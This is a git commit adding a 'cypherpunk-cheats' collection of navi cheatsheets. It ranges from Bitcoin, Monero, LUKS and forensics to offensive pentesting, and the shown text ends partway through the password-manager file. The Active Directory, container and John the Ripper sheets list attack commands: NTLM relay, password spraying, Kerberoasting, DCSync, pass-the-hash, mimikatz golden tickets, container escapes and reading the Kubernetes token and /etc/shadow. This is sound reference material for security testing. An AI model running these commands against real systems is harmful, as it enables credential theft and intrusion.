commit 0fc9b49c22894ea3c41e62c6a53b356164155111
Author: rpriven <rob.pratt@tutanota.com>
Date:   Sun Jan 4 15:05:38 2026 -0700

    Initial cypherpunk-cheats collection: 22 navi cheatsheets

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..98cf01f
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,14 @@
+# OS
+.DS_Store
+Thumbs.db
+
+# Editors
+*.swp
+*.swo
+*~
+.vscode/
+.idea/
+
+# Temp files
+*.tmp
+*.bak
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..d0b0e61
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 rpriven
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..66d6f0f
--- /dev/null
+++ b/README.md
@@ -0,0 +1,104 @@
+# Cypherpunk Cheats
+
+Navi-compatible cheatsheets for security, privacy, and digital sovereignty.
+
+## Installation
+
+```bash
+# Install navi
+cargo install navi
+
+# Or via package manager
+sudo apt install navi  # Debian/Ubuntu
+brew install navi      # macOS
+
+# Add this repo to navi (choose one)
+navi repo add https://github.com/rpriven/cypherpunk-cheats        # GitHub
+navi repo add https://git.djeditech.com/djedi/cypherpunk-cheats   # Mirror
+```
+
+## Manual Setup
+
+Add to your navi config (`~/.config/navi/config.yaml`):
+
+```yaml
+cheats:
+  paths:
+    - /path/to/cypherpunk-cheats
+```
+
+## Usage
+
+```bash
+# Launch navi
+navi
+
+# Query specific topic
+navi --query "nmap"
+navi --query "monero"
+navi --query "luks"
+
+# Preview mode
+navi --preview
+
+# Use with custom path
+navi --path /path/to/cypherpunk-cheats
+```
+
+## Categories
+
+### Offensive Security
+| File | Description |
+|------|-------------|
+| `nmap.cheat` | Port scanning and service enumeration |
+| `web.cheat` | Web application testing (ffuf, sqlmap, nikto) |
+| `hashcat.cheat` | Password cracking with Hashcat |
+| `john.cheat` | John the Ripper password cracking |
+| `privesc-linux.cheat` | Linux privilege escalation |
+| `privesc-windows.cheat` | Windows privilege escalation |
+| `active-directory.cheat` | AD attacks (NetExec, Kerberoasting) |
+| `containers.cheat` | Docker/Kubernetes security |
+| `wireless.cheat` | WiFi attacks (aircrack-ng, WPA cracking) |
+| `tunnels.cheat` | SSH tunnels, chisel, pivoting |
+
+### DFIR & Analysis
+| File | Description |
+|------|-------------|
+| `forensics.cheat` | Volatility, disk imaging, evidence collection |
+| `osint.cheat` | Sherlock, theHarvester, recon-ng |
+| `wireshark.cheat` | Packet analysis (tshark, tcpdump) |
+| `reversing.cheat` | Ghidra, radare2, GDB, binary analysis |
+| `steganography.cheat` | Hidden data extraction (steghide, binwalk) |
+
+### Privacy & Encryption
+| File | Description |
+|------|-------------|
+| `privacy.cheat` | Tor, GPG, age encryption, metadata removal |
+| `luks.cheat` | Full disk encryption (LUKS, dm-crypt) |
+| `pass.cheat` | Password managers (pass, KeePassXC) |
+| `secure-comms.cheat` | Signal CLI, Matrix, encrypted messaging |
+
+### Cryptocurrency & Web3
+| File | Description |
+|------|-------------|
+| `monero.cheat` | Monero CLI wallet operations |
+| `bitcoin.cheat` | Bitcoin Core CLI operations |
+| `solidity.cheat` | Smart contract auditing (Slither, Foundry) |
+
+## Philosophy
+
+Built for cypherpunks who value:
+- **Privacy** - Default to encrypted, anonymous, and sovereign
+- **Security** - Offensive knowledge for defensive thinking
+- **Freedom** - Tools for digital self-determination
+
+## Contributing
+
+PRs welcome! Follow the navi `.cheat` format:
+- `%` tags for categories
+- `#` comments for descriptions
+- `$` for argument completion
+
+## License
+
+MIT
diff --git a/active-directory.cheat b/active-directory.cheat
new file mode 100644
index 0000000..572ad7f
--- /dev/null
+++ b/active-directory.cheat
@@ -0,0 +1,75 @@
+% ad, active-directory, kerberos, windows, netexec
+
+# Start Responder (LLMNR/NBT-NS poisoning)
+sudo responder -I <interface> -dwPv
+
+# SMB relay attack
+sudo ntlmrelayx.py -tf targets.txt -smb2support
+
+# Get domain users (NetExec - replacement for crackmapexec)
+nxc smb <dc_ip> -u <username> -p <password> --users
+
+# Get domain groups
+nxc smb <dc_ip> -u <username> -p <password> --groups
+
+# Password spray
+nxc smb <dc_ip> -u users.txt -p '<password>' --continue-on-success
+
+# Password spray multiple passwords
+nxc smb <dc_ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
+
+# Kerberoasting - Get TGS tickets
+GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc_ip> -request
+
+# AS-REP Roasting
+GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat
+
+# Dump secrets (admin required)
+secretsdump.py <domain>/<username>:<password>@<target>
+
+# Pass the hash
+psexec.py <domain>/<username>@<target> -hashes <lmhash>:<nthash>
+
+# Pass the hash with NetExec
+nxc smb <target> -u <username> -H <nthash>
+
+# DCSync attack
+secretsdump.py <domain>/<username>:<password>@<dc_ip> -just-dc
+
+# Get shell with psexec
+psexec.py <domain>/<username>:<password>@<target>
+
+# Get shell with wmiexec
+wmiexec.py <domain>/<username>:<password>@<target>
+
+# Get shell with evil-winrm
+evil-winrm -i <target> -u <username> -p <password>
+
+# BloodHound collection
+bloodhound-python -d <domain> -u <username> -p <password> -c all -ns <dc_ip>
+
+# PowerView - Get domain info
+Import-Module .\PowerView.ps1; Get-Domain
+
+# PowerView - Get domain users
+Get-DomainUser | select samaccountname
+
+# PowerView - Get domain computers
+Get-DomainComputer | select name
+
+# PowerView - Find domain admins
+Get-DomainGroupMember "Domain Admins"
+
+# Golden ticket with mimikatz
+mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt" "exit"
+
+# Silver ticket
+mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /target:<target> /service:<service> /rc4:<service_hash> /ptt" "exit"
+
+$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
+$ dc_ip: echo ""
+$ domain: echo ""
+$ username: echo ""
+$ password: echo ""
+$ target: echo ""
+$ nthash: echo ""
diff --git a/bitcoin.cheat b/bitcoin.cheat
new file mode 100644
index 0000000..d5600af
--- /dev/null
+++ b/bitcoin.cheat
@@ -0,0 +1,132 @@
+% bitcoin, btc, cryptocurrency, wallet
+
+# Start Bitcoin daemon
+bitcoind
+
+# Start daemon with options
+bitcoind -daemon -server
+
+# Stop daemon
+bitcoin-cli stop
+
+# Get blockchain info
+bitcoin-cli getblockchaininfo
+
+# Get network info
+bitcoin-cli getnetworkinfo
+
+# Get wallet info
+bitcoin-cli getwalletinfo
+
+# Create new wallet
+bitcoin-cli createwallet "<wallet_name>"
+
+# Load wallet
+bitcoin-cli loadwallet "<wallet_name>"
+
+# List wallets
+bitcoin-cli listwallets
+
+# Generate new address
+bitcoin-cli getnewaddress
+
+# Generate new address with label
+bitcoin-cli getnewaddress "<label>"
+
+# Get balance
+bitcoin-cli getbalance
+
+# List unspent outputs
+bitcoin-cli listunspent
+
+# List transactions
+bitcoin-cli listtransactions
+
+# Get transaction details
+bitcoin-cli gettransaction "<txid>"
+
+# Send to address
+bitcoin-cli sendtoaddress "<address>" <amount>
+
+# Send with fee rate
+bitcoin-cli sendtoaddress "<address>" <amount> "" "" false true null "unset" null <fee_rate>
+
+# Create raw transaction
+bitcoin-cli createrawtransaction '[{"txid":"<txid>","vout":<vout>}]' '{"<address>":<amount>}'
+
+# Sign raw transaction
+bitcoin-cli signrawtransactionwithwallet "<hex>"
+
+# Send raw transaction
+bitcoin-cli sendrawtransaction "<hex>"
+
+# Estimate fee (blocks to confirm)
+bitcoin-cli estimatesmartfee <blocks>
+
+# Dump private key (WIF)
+bitcoin-cli dumpprivkey "<address>"
+
+# Import private key
+bitcoin-cli importprivkey "<wif_key>"
+
+# Backup wallet
+bitcoin-cli backupwallet "<backup_path>"
+
+# Encrypt wallet
+bitcoin-cli encryptwallet "<passphrase>"
+
+# Unlock wallet (seconds)
+bitcoin-cli walletpassphrase "<passphrase>" <timeout>
+
+# Lock wallet
+bitcoin-cli walletlock
+
+# Get block hash
+bitcoin-cli getblockhash <height>
+
+# Get block data
+bitcoin-cli getblock "<blockhash>"
+
+# Decode raw transaction
+bitcoin-cli decoderawtransaction "<hex>"
+
+# Verify message signature
+bitcoin-cli verifymessage "<address>" "<signature>" "<message>"
+
+# Sign message
+bitcoin-cli signmessage "<address>" "<message>"
+
+# Sparrow Wallet (GUI - recommended)
+sparrow
+
+# Electrum (lightweight wallet)
+electrum
+
+# Hardware wallet - Trezor
+trezorctl list
+trezorctl get-address -n "m/84'/0'/0'/0/0"
+
+# Hardware wallet - Ledger
+# Use Ledger Live or HWI
+
+# Bitcoin Core config (~/.bitcoin/bitcoin.conf)
+# server=1
+# rpcuser=user
+# rpcpassword=pass
+# txindex=1
+
+$ wallet_name: bitcoin-cli listwallets 2>/dev/null | jq -r '.[]' 2>/dev/null
+$ label: echo "main"
+$ txid: echo ""
+$ address: echo ""
+$ amount: echo "0.001"
+$ fee_rate: echo "10"
+$ vout: echo "0"
+$ hex: echo ""
+$ wif_key: echo ""
+$ backup_path: echo "wallet_backup.dat"
+$ passphrase: echo ""
+$ timeout: echo "60"
+$ height: echo "0"
+$ blockhash: echo ""
+$ blocks: echo "6"
diff --git a/containers.cheat b/containers.cheat
new file mode 100644
index 0000000..3a2cd49
--- /dev/null
+++ b/containers.cheat
@@ -0,0 +1,67 @@
+% docker, kubernetes, containers, escape
+
+# Check if inside container
+ls -la /.dockerenv
+cat /proc/1/cgroup | grep docker
+
+# List docker images
+docker images
+
+# List running containers
+docker ps
+
+# List all containers
+docker ps -a
+
+# Execute into container
+docker exec -it <container_id> /bin/bash
+
+# Inspect container
+docker inspect <container_id>
+
+# Docker socket escape (if socket mounted)
+docker run -v /:/hostfs -it alpine chroot /hostfs
+
+# Privileged container escape - mount host
+mkdir /mnt/host && mount /dev/sda1 /mnt/host
+
+# Check capabilities
+capsh --print
+
+# Kubernetes - get pods
+kubectl get pods
+
+# Kubernetes - get all namespaces
+kubectl get namespaces
+
+# Kubernetes - get pods all namespaces
+kubectl get pods --all-namespaces
+
+# Kubernetes - get secrets
+kubectl get secrets
+
+# Kubernetes - decode secret
+kubectl get secret <secret_name> -o yaml
+
+# Kubernetes - exec into pod
+kubectl exec -it <pod_name> -- /bin/bash
+
+# Get service account token
+cat /var/run/secrets/kubernetes.io/serviceaccount/token
+
+# Check RBAC permissions
+kubectl auth can-i --list
+
+# Trivy - scan image
+trivy image <image_name>
+
+# Deepce - Docker enumeration
+./deepce.sh
+
+# CDK - container pentest toolkit
+./cdk evaluate
+
+$ container_id: docker ps --format "{{.ID}}\t{{.Names}}" 2>/dev/null
+$ pod_name: kubectl get pods --no-headers 2>/dev/null | awk '{print $1}'
+$ secret_name: kubectl get secrets --no-headers 2>/dev/null | awk '{print $1}'
+$ image_name: docker images --format "{{.Repository}}:{{.Tag}}" 2>/dev/null
diff --git a/forensics.cheat b/forensics.cheat
new file mode 100644
index 0000000..93bddf6
--- /dev/null
+++ b/forensics.cheat
@@ -0,0 +1,97 @@
+% forensics, dfir, volatility, memory, incident-response
+
+# Volatility 3 - identify OS
+vol -f <memory_dump> windows.info
+
+# Volatility 3 - process list
+vol -f <memory_dump> windows.pslist
+
+# Volatility 3 - process tree
+vol -f <memory_dump> windows.pstree
+
+# Volatility 3 - hidden processes
+vol -f <memory_dump> windows.psscan
+
+# Volatility 3 - network connections
+vol -f <memory_dump> windows.netscan
+
+# Volatility 3 - command line history
+vol -f <memory_dump> windows.cmdline
+
+# Volatility 3 - DLLs for process
+vol -f <memory_dump> windows.dlllist --pid <pid>
+
+# Volatility 3 - malware detection
+vol -f <memory_dump> windows.malfind
+
+# Volatility 3 - registry hives
+vol -f <memory_dump> windows.registry.hivelist
+
+# Volatility 3 - dump process memory
+vol -f <memory_dump> windows.memmap --pid <pid> --dump
+
+# Volatility 2 - image info (legacy)
+volatility -f <memory_dump> imageinfo
+
+# Volatility 2 - with profile
+volatility -f <memory_dump> --profile=<profile> pslist
+
+# Disk imaging with dd
+sudo dd if=<source_device> of=<output_file> bs=64K conv=noerror,sync status=progress
+
+# Disk imaging with dcfldd (forensic)
+sudo dcfldd if=<source_device> of=<output_file> hash=md5,sha256 hashlog=hashes.txt
+
+# Mount forensic image read-only
+sudo mount -o ro,loop,noexec <image_file> <mount_point>
+
+# Mount with offset (partition)
+sudo mount -o ro,loop,offset=$((512*<sector_offset>)) <image_file> <mount_point>
+
+# File carving with foremost
+foremost -i <image_file> -o <output_dir>
+
+# File recovery with photorec
+photorec <image_file>
+
+# File recovery with scalpel
+scalpel -c /etc/scalpel/scalpel.conf -o <output_dir> <image_file>
+
+# Timeline with plaso
+log2timeline.py <output.plaso> <evidence_source>
+
+# Parse plaso timeline
+psort.py -o l2tcsv <output.plaso> -w timeline.csv
+
+# Extract strings from binary
+strings -n 8 <file>
+strings -e l <file>
+
+# Calculate file hashes
+md5sum <file> && sha256sum <file>
+
+# Chainsaw - Windows event log hunting
+chainsaw hunt <evtx_dir> --rules <sigma_rules_dir>
+
+# Parse Windows prefetch
+PECmd.exe -d C:\Windows\Prefetch --csv <output_dir>
+
+# Registry analysis with RegRipper
+rip.pl -r <registry_hive> -p all
+
+# KAPE collection
+kape.exe --tsource C: --tdest <output_dir> --target !SANS_Triage
+
+# Autopsy (GUI forensics)
+autopsy
+
+$ memory_dump: find . -name "*.raw" -o -name "*.mem" -o -name "*.dmp" 2>/dev/null
+$ source_device: lsblk -dpno NAME | head -5
+$ output_file: echo "disk.raw"
+$ image_file: find . -name "*.raw" -o -name "*.dd" -o -name "*.img" 2>/dev/null
+$ mount_point: echo "/mnt/evidence"
+$ output_dir: echo "output"
+$ pid: echo ""
+$ profile: echo "Win10x64_19041"
+$ sector_offset: echo "2048"
+$ evtx_dir: echo "/path/to/evtx"
diff --git a/hashcat.cheat b/hashcat.cheat
new file mode 100644
index 0000000..62402d0
--- /dev/null
+++ b/hashcat.cheat
@@ -0,0 +1,50 @@
+% hashcat, cracking, passwords
+
+# Crack MD5 hash
+hashcat -m 0 <hashfile> <wordlist> -O
+
+# Crack NTLM hash
+hashcat -m 1000 <hashfile> <wordlist> -O
+
+# Crack NTLMv2 (Responder capture)
+hashcat -m 5600 <hashfile> <wordlist> -O
+
+# Crack SHA-512 Linux ($6$)
+hashcat -m 1800 <hashfile> <wordlist> -O
+
+# Crack Kerberoasting TGS
+hashcat -m 13100 <hashfile> <wordlist> -O
+
+# Crack AS-REP Roast
+hashcat -m 18200 <hashfile> <wordlist> -O
+
+# Crack WPA2
+hashcat -m 22000 <hashfile> <wordlist> -O
+
+# Crack bcrypt
+hashcat -m 3200 <hashfile> <wordlist> -O
+
+# Crack JWT
+hashcat -m 16500 <hashfile> <wordlist> -O
+
+# With rules (best64)
+hashcat -m <mode> <hashfile> <wordlist> -r /usr/share/hashcat/rules/best64.rule -O
+
+# Mask attack - 4 digits
+hashcat -m <mode> <hashfile> -a 3 ?d?d?d?d
+
+# Mask attack - 8 lowercase
+hashcat -m <mode> <hashfile> -a 3 ?l?l?l?l?l?l?l?l
+
+# Mask attack - Password1! pattern
+hashcat -m <mode> <hashfile> -a 3 ?u?l?l?l?l?l?l?l?d?s
+
+# Show cracked passwords
+hashcat -m <mode> <hashfile> --show
+
+# Resume session
+hashcat --restore
+
+$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ mode: echo "0\n100\n1000\n1400\n1700\n1800\n3200\n5600\n13100\n18200" --- --header "Mode: 0=MD5, 100=SHA1, 1000=NTLM, 1400=SHA256, 1700=SHA512, 1800=sha512crypt, 3200=bcrypt, 5600=NTLMv2, 13100=Kerberoast, 18200=AS-REP"
diff --git a/john.cheat b/john.cheat
new file mode 100644
index 0000000..0b21ceb
--- /dev/null
+++ b/john.cheat
@@ -0,0 +1,58 @@
+% john, cracking, passwords
+
+# Auto-detect and crack
+john <hashfile>
+
+# Crack with wordlist
+john --wordlist=<wordlist> <hashfile>
+
+# Crack NTLM
+john --format=nt --wordlist=<wordlist> <hashfile>
+
+# Crack MD5
+john --format=raw-md5 --wordlist=<wordlist> <hashfile>
+
+# Crack SHA-512 Linux
+john --format=sha512crypt --wordlist=<wordlist> <hashfile>
+
+# Crack bcrypt
+john --format=bcrypt --wordlist=<wordlist> <hashfile>
+
+# Show cracked passwords
+john --show <hashfile>
+
+# With rules
+john --wordlist=<wordlist> --rules <hashfile>
+
+# SSH key crack
+ssh2john <ssh_key> > ssh_hash.txt && john --wordlist=<wordlist> ssh_hash.txt
+
+# ZIP file crack
+zip2john <zip_file> > zip_hash.txt && john --wordlist=<wordlist> zip_hash.txt
+
+# RAR file crack
+rar2john <rar_file> > rar_hash.txt && john --wordlist=<wordlist> rar_hash.txt
+
+# PDF crack
+pdf2john <pdf_file> > pdf_hash.txt && john --wordlist=<wordlist> pdf_hash.txt
+
+# Office document crack
+office2john <office_file> > office_hash.txt && john --wordlist=<wordlist> office_hash.txt
+
+# KeePass crack
+keepass2john <kdbx_file> > keepass_hash.txt && john --wordlist=<wordlist> keepass_hash.txt
+
+# Linux shadow file
+unshadow /etc/passwd /etc/shadow > unshadowed.txt && john --wordlist=<wordlist> unshadowed.txt
+
+# List available formats
+john --list=formats
+
+$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ ssh_key: find . -name "id_rsa" -o -name "*.pem" 2>/dev/null
+$ zip_file: find . -name "*.zip" 2>/dev/null
+$ rar_file: find . -name "*.rar" 2>/dev/null
+$ pdf_file: find . -name "*.pdf" 2>/dev/null
+$ office_file: find . -name "*.docx" -o -name "*.xlsx" 2>/dev/null
+$ kdbx_file: find . -name "*.kdbx" 2>/dev/null
diff --git a/luks.cheat b/luks.cheat
new file mode 100644
index 0000000..26a88e0
--- /dev/null
+++ b/luks.cheat
@@ -0,0 +1,124 @@
+% luks, encryption, disk, dm-crypt, fde
+
+# Check if device is LUKS
+sudo cryptsetup isLuks <device>
+
+# LUKS info
+sudo cryptsetup luksDump <device>
+
+# Create LUKS volume
+sudo cryptsetup luksFormat <device>
+
+# Create LUKS2 volume (recommended)
+sudo cryptsetup luksFormat --type luks2 <device>
+
+# Create LUKS with specific cipher
+sudo cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 512 --hash sha512 <device>
+
+# Open LUKS volume
+sudo cryptsetup luksOpen <device> <mapper_name>
+
+# Open LUKS (alternative syntax)
+sudo cryptsetup open <device> <mapper_name>
+
+# Close LUKS volume
+sudo cryptsetup luksClose <mapper_name>
+
+# Add key to LUKS
+sudo cryptsetup luksAddKey <device>
+
+# Add key from file
+sudo cryptsetup luksAddKey <device> <keyfile>
+
+# Remove key
+sudo cryptsetup luksRemoveKey <device>
+
+# Kill key slot
+sudo cryptsetup luksKillSlot <device> <slot_number>
+
+# Change passphrase
+sudo cryptsetup luksChangeKey <device>
+
+# Create filesystem on opened LUKS
+sudo mkfs.ext4 /dev/mapper/<mapper_name>
+
+# Mount LUKS volume
+sudo mount /dev/mapper/<mapper_name> <mount_point>
+
+# Unmount LUKS volume
+sudo umount <mount_point>
+sudo cryptsetup luksClose <mapper_name>
+
+# Create encrypted file container
+dd if=/dev/zero of=<container_file> bs=1M count=<size_mb>
+sudo cryptsetup luksFormat <container_file>
+sudo cryptsetup luksOpen <container_file> <mapper_name>
+sudo mkfs.ext4 /dev/mapper/<mapper_name>
+
+# Backup LUKS header
+sudo cryptsetup luksHeaderBackup <device> --header-backup-file <backup_file>
+
+# Restore LUKS header
+sudo cryptsetup luksHeaderRestore <device> --header-backup-file <backup_file>
+
+# Erase LUKS header (DESTROYS DATA!)
+sudo cryptsetup luksErase <device>
+
+# Check LUKS status
+sudo cryptsetup status <mapper_name>
+
+# Benchmark encryption
+cryptsetup benchmark
+
+# Auto-mount with /etc/crypttab
+# <mapper_name> <device> none luks
+
+# Auto-mount with keyfile
+# <mapper_name> <device> <keyfile> luks
+
+# Full disk encryption install (Ubuntu)
+# Select "Encrypt the new Ubuntu installation" during install
+
+# Encrypt home directory (ecryptfs - legacy)
+sudo apt install ecryptfs-utils
+ecryptfs-migrate-home -u <username>
+
+# LUKS on LVM
+sudo pvcreate /dev/mapper/<mapper_name>
+sudo vgcreate <vg_name> /dev/mapper/<mapper_name>
+sudo lvcreate -l 100%FREE -n <lv_name> <vg_name>
+
+# Resize LUKS volume (grow)
+sudo cryptsetup resize <mapper_name>
+sudo resize2fs /dev/mapper/<mapper_name>
+
+# Create encrypted swap
+sudo cryptsetup luksFormat <swap_device>
+sudo cryptsetup luksOpen <swap_device> cryptswap
+sudo mkswap /dev/mapper/cryptswap
+sudo swapon /dev/mapper/cryptswap
+
+# VeraCrypt CLI - create volume
+veracrypt -t -c
+
+# VeraCrypt CLI - mount
+veracrypt <volume_file> <mount_point>
+
+# VeraCrypt CLI - dismount
+veracrypt -d
+
+# VeraCrypt CLI - list mounted
+veracrypt -l
+
+$ device: lsblk -dpno NAME | grep -v loop
+$ mapper_name: ls /dev/mapper 2>/dev/null | grep -v control
+$ mount_point: echo "/mnt/encrypted"
+$ keyfile: echo "/root/keyfile"
+$ backup_file: echo "luks_header.backup"
+$ container_file: echo "encrypted_container.img"
+$ size_mb: echo "1024"
+$ slot_number: echo "0\n1\n2\n3\n4\n5\n6\n7"
+$ username: whoami
+$ vg_name: echo "encrypted_vg"
+$ lv_name: echo "data"
+$ volume_file: find ~ -name "*.hc" -o -name "*.tc" 2>/dev/null | head -5
diff --git a/monero.cheat b/monero.cheat
new file mode 100644
index 0000000..9f1d69a
--- /dev/null
+++ b/monero.cheat
@@ -0,0 +1,121 @@
+% monero, xmr, cryptocurrency, wallet
+
+# Start Monero daemon
+monerod
+
+# Start daemon with remote node (no local blockchain)
+monerod --bootstrap-daemon-address auto
+
+# Start wallet CLI
+monero-wallet-cli
+
+# Create new wallet
+monero-wallet-cli --generate-new-wallet <wallet_name>
+
+# Open existing wallet
+monero-wallet-cli --wallet-file <wallet_file>
+
+# Connect to remote node
+monero-wallet-cli --daemon-address <node_address>
+
+# Restore wallet from seed
+monero-wallet-cli --restore-deterministic-wallet
+
+# Restore from keys
+monero-wallet-cli --generate-from-keys <wallet_name>
+
+# Check balance (in wallet)
+balance
+
+# Check unlocked balance
+balance unlocked
+
+# Get wallet address
+address
+
+# Get all addresses (subaddresses)
+address all
+
+# Create new subaddress
+address new <label>
+
+# Show seed (KEEP SECRET!)
+seed
+
+# Show private keys (KEEP SECRET!)
+spendkey
+viewkey
+
+# Transfer XMR
+transfer <address> <amount>
+
+# Transfer with priority
+transfer <priority> <address> <amount>
+
+# Sweep all to address
+sweep_all <address>
+
+# Show transaction history
+show_transfers
+
+# Show incoming transfers
+show_transfers in
+
+# Show outgoing transfers
+show_transfers out
+
+# Show pending transfers
+show_transfers pending
+
+# Check transaction status
+show_transfer <txid>
+
+# Export outputs (for hardware wallet)
+export_outputs outputs.txt
+
+# Import outputs
+import_outputs outputs.txt
+
+# Export key images
+export_key_images key_images.txt
+
+# Sign message with wallet
+sign <message>
+
+# Verify signed message
+verify <address> <signature> <message>
+
+# Rescan blockchain
+rescan_bc
+
+# Rescan spent outputs
+rescan_spent
+
+# Refresh wallet
+refresh
+
+# Set daemon address
+set_daemon <node_address>
+
+# Check daemon status
+status
+
+# Get fee estimate
+fee
+
+# Stop wallet
+exit
+
+# Public remote nodes (use with caution)
+# node.moneroworld.com:18089
+# nodes.hashvault.pro:18081
+# xmr-node.cakewallet.com:18081
+
+$ wallet_name: echo "my_wallet"
+$ wallet_file: find ~ -name "*.keys" 2>/dev/null | head -5
+$ node_address: echo "node.moneroworld.com:18089"
+$ address: echo ""
+$ amount: echo "0.1"
+$ priority: echo "0\n1\n2\n3\n4" --- --header "0=default, 1=unimportant, 2=normal, 3=elevated, 4=priority"
+$ txid: echo ""
+$ label: echo "donation"
diff --git a/nmap.cheat b/nmap.cheat
new file mode 100644
index 0000000..6aab9e7
--- /dev/null
+++ b/nmap.cheat
@@ -0,0 +1,53 @@
+% nmap, scanning, recon
+
+# Quick SYN scan (top 1000 ports)
+nmap -sS <target>
+
+# Full port scan (all 65535)
+nmap -sS -p- <target>
+
+# Service version detection
+nmap -sV <target>
+
+# OS detection
+nmap -O <target>
+
+# Aggressive scan (OS, version, scripts, traceroute)
+nmap -A <target>
+
+# UDP scan (top ports)
+nmap -sU --top-ports 20 <target>
+
+# Script scan (default scripts)
+nmap -sC <target>
+
+# Vulnerability scan
+nmap --script vuln <target>
+
+# SMB enumeration
+nmap --script smb-enum-shares,smb-enum-users -p 445 <target>
+
+# HTTP enumeration
+nmap --script http-enum -p 80,443 <target>
+
+# Full comprehensive scan
+nmap -sS -sV -sC -O -p- -oA scan_<target> <target>
+
+# Scan multiple targets from file
+nmap -iL <targets_file>
+
+# Fast scan (top 100 ports)
+nmap -F <target>
+
+# Ping sweep (host discovery)
+nmap -sn <network_cidr>
+
+# Skip ping (scan even if host appears down)
+nmap -Pn <target>
+
+# Output all formats
+nmap -sS -sV -oA output_<target> <target>
+
+$ target: echo ""
+$ targets_file: find . -name "*.txt" -type f 2>/dev/null
+$ network_cidr: echo "192.168.1.0/24"
diff --git a/osint.cheat b/osint.cheat
new file mode 100644
index 0000000..0a96d4b
--- /dev/null
+++ b/osint.cheat
@@ -0,0 +1,106 @@
+% osint, recon, reconnaissance, intelligence
+
+# Sherlock - username search
+sherlock <username>
+
+# Sherlock - multiple usernames
+sherlock <username1> <username2> <username3>
+
+# Maigret - username search (better)
+maigret <username>
+
+# theHarvester - all sources
+theHarvester -d <domain> -b all
+
+# theHarvester - specific sources
+theHarvester -d <domain> -b google,linkedin,twitter
+
+# Subfinder - subdomain enumeration
+subfinder -d <domain>
+
+# Subfinder - with output
+subfinder -d <domain> -o subdomains.txt
+
+# Amass - subdomain enum
+amass enum -d <domain>
+
+# Amass - passive only
+amass enum -passive -d <domain>
+
+# Certificate transparency lookup
+curl -s "https://crt.sh/?q=%.<domain>&output=json" | jq -r '.[].name_value' | sort -u
+
+# DNS enumeration
+dig <domain> ANY
+dig <domain> MX
+dig <domain> TXT
+
+# Zone transfer attempt
+dig axfr @<nameserver> <domain>
+
+# Whois lookup
+whois <domain>
+
+# Reverse whois (by email)
+# Use viewdns.info or whoxy.com
+
+# Google dorking - site specific
+# site:<domain> filetype:pdf
+
+# Google dorking - login pages
+# site:<domain> inurl:login OR inurl:admin
+
+# Google dorking - exposed files
+# site:<domain> filetype:sql OR filetype:env OR filetype:log
+
+# Wayback machine URLs
+waybackurls <domain>
+
+# GitHub dorking - secrets
+# org:<company> password OR api_key OR secret
+
+# Shodan - host info
+shodan host <ip>
+
+# Shodan - search
+shodan search "hostname:<domain>"
+
+# Shodan - org search
+shodan search 'org:"<company_name>"'
+
+# Email verification
+curl "https://api.hunter.io/v2/email-verifier?email=<email>&api_key=<api_key>"
+
+# SpiderFoot scan
+spiderfoot -s <target> -o output.html
+
+# Recon-ng
+recon-ng
+# Then: marketplace install all
+# workspaces create <name>
+# modules load recon/domains-hosts/hackertarget
+
+# Social media - Instagram OSINT
+# instaloader <username>
+
+# Image reverse search
+# Google Images, TinEye, Yandex
+
+# Metadata extraction
+exiftool <image>
+
+# GPS from image
+exiftool -gpslatitude -gpslongitude <image>
+
+# Check if email is breached
+# haveibeenpwned.com API or dehashed.com
+
+$ username: echo ""
+$ domain: echo ""
+$ ip: echo ""
+$ nameserver: echo ""
+$ company_name: echo ""
+$ email: echo ""
+$ api_key: echo ""
+$ target: echo ""
+$ image: find . -name "*.jpg" -o -name "*.png" 2>/dev/null | head -5
diff --git a/pass.cheat b/pass.cheat
new file mode 100644
index 0000000..6a7b0c0
--- /dev/null
+++ b/pass.cheat
@@ -0,0 +1,134 @@
+% pass, password-manager, gpg, keepass
+
+# Initialize password store
+pass init <gpg_key_id>
+
+# Initialize with git
+pass git init
+
+# List all passwords
+pass
+
+# List passwords in folder
+pass <folder>
+
+# Show password
+pass <entry>
+
+# Show password (clipboard, 45 sec)
+pass -c <entry>
+
+# Generate new password
+pass generate <entry> <length>
+
+# Generate without symbols
+pass generate -n <entry> <length>
+
+# Generate and copy to clipboard
+pass generate -c <entry> <length>
+
+# Insert password manually
+pass insert <entry>
+
+# Insert multiline
+pass insert -m <entry>
+
+# Edit password
+pass edit <entry>
+
+# Remove password
+pass rm <entry>
+
+# Move/rename password
+pass mv <old_entry> <new_entry>
+
+# Copy password entry
+pass cp <entry> <new_entry>
+
+# Find password
+pass find <search_term>
+
+# Search in passwords
+pass grep <search_term>
+
+# Git push changes
+pass git push
+
